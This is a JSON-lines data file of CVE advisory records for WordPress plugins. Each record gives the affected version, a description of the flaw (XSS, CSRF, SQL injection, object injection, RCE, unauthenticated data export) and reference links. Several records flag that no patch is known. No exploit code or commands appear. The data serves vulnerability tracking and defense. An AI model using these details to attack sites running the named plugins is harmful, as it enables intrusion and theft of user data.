{"CVE_ID":"CVE-2024-8095","slug":"babelz","versionImpact":"1.1.5","description":"The BabelZ  WordPress plugin through 1.1.5 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56d22ad0-c5f5-488b-bc1f-73188dfc71d2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56d22ad0-c5f5-488b-bc1f-73188dfc71d2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6814","slug":"booking-x","description":"The Booking X plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_now() function in versions 1.0 to 1.1.2. This makes it possible for unauthenticated attackers to download all plugin data, including user accounts, user meta, and PayPal credentials, by issuing a crafted POST request.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/admin\\\/class-bookingx-admin.php#L784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/admin\\\/class-bookingx-admin.php#L784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/includes\\\/class-bookingx.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/includes\\\/class-bookingx.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-x\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-x\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a30d572-e086-4b83-8cb7-4cef9a3253bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a30d572-e086-4b83-8cb7-4cef9a3253bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23685","slug":"tlp-portfolio","versionImpact":"2.8.10","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in RadiusTheme Portfolio \u2013 WordPress Portfolio plugin <= 2.8.10 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tlp-portfolio\\\/wordpress-portfolio-wordpress-portfolio-plugin-plugin-2-8-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tlp-portfolio\\\/wordpress-portfolio-wordpress-portfolio-plugin-plugin-2-8-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2492","slug":"querywall","versionImpact":"1.1.1","description":"The QueryWall: Plug'n Play Firewall WordPress plugin through 1.1.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa7c54c2-5653-4d3d-8163-f3d63272c050\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa7c54c2-5653-4d3d-8163-f3d63272c050\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6986","slug":"embedpress","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed_oembed_html shortcode in all versions up to 3.9.5 (exclusive) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceae0115-268c-401b-876b-3477d10c10e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceae0115-268c-401b-876b-3477d10c10e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014595%40embedpress&new=3014595%40embedpress&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014595%40embedpress&new=3014595%40embedpress&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7064","slug":"auxin-elements","versionImpact":"2.15.2","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.15.2 via deserialization of untrusted input from the vulnerable 'id' parameter in the 'auxin_template_control_importer' function. This makes it possible for authenticated attackers able to upload a separate PHAR payload as an image file to inject a PHP Object, though the action itself is available to subscribers. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0882205-3037-4ada-9e44-ddd55d88fcb1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0882205-3037-4ada-9e44-ddd55d88fcb1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2953","slug":"luckywp-table-of-contents","versionImpact":"2.1.4","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Contributor permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b12c0524-d991-4f96-8646-f4203880558c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b12c0524-d991-4f96-8646-f4203880558c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L210\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9938","slug":"bounce-handler-mailpoet","versionImpact":"1.3.21","description":"The Bounce Handler MailPoet 3 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.3.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2c6fefe-f6f3-44ce-906c-abad717840d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2c6fefe-f6f3-44ce-906c-abad717840d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bounce-handler-mailpoet\\\/trunk\\\/includes\\\/class-mailpoet-bounce-log.php#L193\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bounce-handler-mailpoet\\\/trunk\\\/includes\\\/class-mailpoet-bounce-log.php#L193\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11897","slug":"mightyforms","versionImpact":"1.3.9","description":"The Contact Form, Survey & Form Builder \u2013 MightyForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mightyforms' shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mightyforms\\\/trunk\\\/shortcode.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mightyforms\\\/trunk\\\/shortcode.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mightyforms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mightyforms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11883","slug":"connatix-video-embed","versionImpact":"1.0.5","description":"The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/connatix-video-embed\\\/tags\\\/1.0.5\\\/connatix-video-embed.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/connatix-video-embed\\\/tags\\\/1.0.5\\\/connatix-video-embed.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89512190-a0fe-495a-9dda-8d8540a5325c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89512190-a0fe-495a-9dda-8d8540a5325c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12159","slug":"muzaara-adwords-optimize-dashboard","versionImpact":"3.1","description":"The Optimize Your Campaigns \u2013 Google Shopping \u2013 Google Ads \u2013 Google Adwords plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1 due to the print_php_information.php being publicly accessible. This makes it possible for unauthenticated attackers to extract sensitive configuration data that can be leveraged in another attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/muzaara-adwords-optimize-dashboard\\\/trunk\\\/lib\\\/muzaara\\\/lib\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/muzaara-adwords-optimize-dashboard\\\/trunk\\\/lib\\\/muzaara\\\/lib\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfeca343-c796-45d5-a71d-8211d8b38b3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfeca343-c796-45d5-a71d-8211d8b38b3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12275","slug":"canvasflow","versionImpact":"1.5.5","description":"The Canvasflow for WordPress plugin through 1.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8094","slug":"ntzantispam","versionImpact":"2.0e","description":"The Ntz Antispam WordPress plugin through 2.0e does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cacfde9e-c6fa-4918-8e59-461b67b5e979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cacfde9e-c6fa-4918-8e59-461b67b5e979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4429","slug":"gearside-developer-dashboard","versionImpact":"1.0.72","description":"The Gearside Developer Dashboard WordPress plugin through 1.0.72 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6787","slug":"smart-docs","versionImpact":"1.1.0","description":"The Smart Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'smartdocs_search' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-docs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-docs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70c41a28-982f-43e6-9415-3a2d996959f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70c41a28-982f-43e6-9415-3a2d996959f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1840","slug":"spotify-play-button-for-wordpress","versionImpact":"2.07","description":"The Sp*tify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.07 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/308f6887-7c1c-4efd-85e2-b71bb6d26dab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/308f6887-7c1c-4efd-85e2-b71bb6d26dab?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2893653%40spotify-play-button-for-wordpress%2Ftrunk&old=2870608%40spotify-play-button-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2893653%40spotify-play-button-for-wordpress%2Ftrunk&old=2870608%40spotify-play-button-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2835","slug":"wpdirectorykit","versionImpact":"1.2.3","description":"The WP Directory Kit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search' parameter in versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847f1c00-0e8f-4d38-84af-fe959e2efe5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847f1c00-0e8f-4d38-84af-fe959e2efe5c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917413\\\/wpdirectorykit\\\/trunk\\\/application\\\/views\\\/wdk_messages\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917413\\\/wpdirectorykit\\\/trunk\\\/application\\\/views\\\/wdk_messages\\\/index.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/WDK-xss-exploit.md\",\"name\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/WDK-xss-exploit.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4141","slug":"wp-ultimate-csv-importer","versionImpact":"7.9.8","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 7.9.8 via the '->cus2' parameter. This allows authenticated attackers with author-level permissions or above, if the administrator previously grants access in the plugin settings, to create a PHP file and execute code on the server. The author resolved this vulnerability by removing the ability for authors and editors to import files, please note that this means php file creation is still allowed for site administrators, use the plugin with caution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4fe8b1f-da1c-4f94-9ab4-272766b488c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4fe8b1f-da1c-4f94-9ab4-272766b488c3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6981","slug":"wp-sms","versionImpact":"6.5","description":"The WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to SQL Injection via the 'group_id' parameter in all versions up to, and including, 6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can be leveraged to achieve Reflected Cross-site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f53053-5150-4fba-b8d6-3d6c9df32c69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f53053-5150-4fba-b8d6-3d6c9df32c69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/6656de201efe67c7983102c344a546eed976a819\",\"name\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/6656de201efe67c7983102c344a546eed976a819\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2163","slug":"ninja-beaver-lite-addons-for-beaver-builder","versionImpact":"2.4.5","description":"The Ninja Beaver Add-ons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.4.5 due to insufficient input sanitization and output escaping on user supplied attributes such as urls. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e257954-9e44-4939-8e01-efceb3c0953a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e257954-9e44-4939-8e01-efceb3c0953a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-beaver-lite-addons-for-beaver-builder\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-beaver-lite-addons-for-beaver-builder\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5003","slug":"wp-stacker","versionImpact":"1.8.5","description":"The WP Stacker WordPress plugin through 1.8.5 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d7d0372-bbc5-40b2-a668-253c819415c4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d7d0372-bbc5-40b2-a668-253c819415c4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9207","slug":"buddypress-docs","versionImpact":"2.2.3","description":"The BuddyPress Docs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2181c89-4f40-45b9-8c12-448ca263a2f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2181c89-4f40-45b9-8c12-448ca263a2f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/templatetags.php#L282\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/templatetags.php#L282\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/addon-history.php#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/addon-history.php#L368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file32\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9454","slug":"pripre","versionImpact":"0.4.11","description":"The PriPre plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6662fee4-7e04-492f-bf79-2c915da92c92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6662fee4-7e04-492f-bf79-2c915da92c92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pripre\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pripre\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
